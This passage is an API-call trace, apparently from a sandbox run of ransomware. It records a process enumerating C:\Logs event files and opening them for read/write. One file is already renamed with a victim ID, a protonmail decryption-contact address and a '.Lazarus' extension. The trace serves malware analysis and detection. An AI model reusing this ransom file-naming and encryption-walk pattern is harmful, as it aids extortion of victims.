(HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0087.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0087.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c7a0 [0087.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0087.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0087.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0087.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0087.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0087.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0087.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0087.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0087.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0087.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0087.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0087.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d178 [0087.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0087.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x814c8 [0087.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0087.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81cb0 [0087.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x814c8 | out: hHeap=0x20000) returned 1 [0087.856] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.856] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.856] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.856] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81cb0 | out: hHeap=0x20000) returned 1 [0087.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d178 | out: hHeap=0x20000) returned 1 [0087.856] AreFileApisANSI () returned 1 [0087.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\System.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\System.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", lpUsedDefaultChar=0x0) returned 82 [0087.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0087.856] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.856] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0087.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0087.856] AreFileApisANSI () returned 1 [0087.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0087.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f2c8 [0087.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x5f2c8, cchWideChar=82 | out: lpWideCharStr="C:\\Logs\\System.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 82 [0087.856] CreateFileW (lpFileName="C:\\Logs\\System.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\logs\\system.evtx.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0087.857] GetFileType (hFile=0x41c) returned 0x1 [0087.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0087.857] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.857] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.857] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.857] CloseHandle (hObject=0x41c) returned 1 [0087.857] AreFileApisANSI () returned 1 [0087.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0087.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x60138 [0087.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x60138, cchWideChar=82 | out: lpWideCharStr="C:\\Logs\\System.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 82 [0087.858] CreateFileW (lpFileName="C:\\Logs\\System.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\logs\\system.evtx.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0087.858] GetFileType (hFile=0x41c) returned 0x1 [0087.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0087.858] CloseHandle (hObject=0x41c) returned 1 [0087.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0087.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0087.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0087.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d028 [0087.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0087.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0087.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0087.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d028 | out: hHeap=0x20000) returned 1 [0087.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0087.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c8f0 [0087.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0087.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0087.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0087.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c8f0 | out: hHeap=0x20000) returned 1 [0087.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0087.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0087.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0087.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0087.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0087.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0087.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0087.859] AreFileApisANSI () returned 1 [0087.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0087.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x60088 [0087.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x60088, cchWideChar=82 | out: lpWideCharStr="C:\\Logs\\System.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 82 [0087.859] GetFileAttributesExW (in: lpFileName="C:\\Logs\\System.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\logs\\system.evtx.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505097c4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505097c4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x8de25170, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x111000)) returned 1 [0087.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0087.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0087.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0087.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0087.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.859] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Windows PowerShell.evtx", cAlternateFileName="WINDOW~1.EVT")) returned 1 [0087.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0087.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0087.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0087.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0087.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0087.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0087.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0087.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0087.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0087.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0087.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0087.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0087.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0087.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0087.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0087.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0087.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0087.860] AreFileApisANSI () returned 1 [0087.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Windows PowerShell.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Windows PowerShell.evtx", lpUsedDefaultChar=0x0) returned 32 [0087.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0087.860] AreFileApisANSI () returned 1 [0087.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0087.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0087.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=32 | out: lpWideCharStr="C:\\Logs\\Windows PowerShell.evtx") returned 32 [0087.861] CreateFileW (lpFileName="C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0087.861] GetFileType (hFile=0x41c) returned 0x1 [0087.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0087.861] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.861] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.861] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.861] CloseHandle (hObject=0x41c) returned 1 [0087.862] AreFileApisANSI () returned 1 [0087.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0087.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0087.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=32 | out: lpWideCharStr="C:\\Logs\\Windows PowerShell.evtx") returned 32 [0087.862] CreateFileW (lpFileName="C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0087.862] GetFileType (hFile=0x41c) returned 0x1 [0087.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0087.862] CloseHandle (hObject=0x41c) returned 1 [0087.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0087.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0087.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0087.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0087.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0087.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0087.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0087.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0087.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0087.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0087.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0087.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0087.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0087.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0087.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0087.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0087.863] AreFileApisANSI () returned 1 [0087.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0087.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0087.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=32 | out: lpWideCharStr="C:\\Logs\\Windows PowerShell.evtx") returned 32 [0087.863] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0087.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.863] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.863] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.863] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3e, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68e08, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3e, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧က\x01⺊Ās\\붼聐̧㑍Ā̧輐\x07̧비聐က\x01က\x01.evtx")) returned 0 [0087.863] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0087.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0087.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0087.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0087.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0087.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0087.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0087.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0087.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.863] HeapFree (in: hHeap=0x20000, 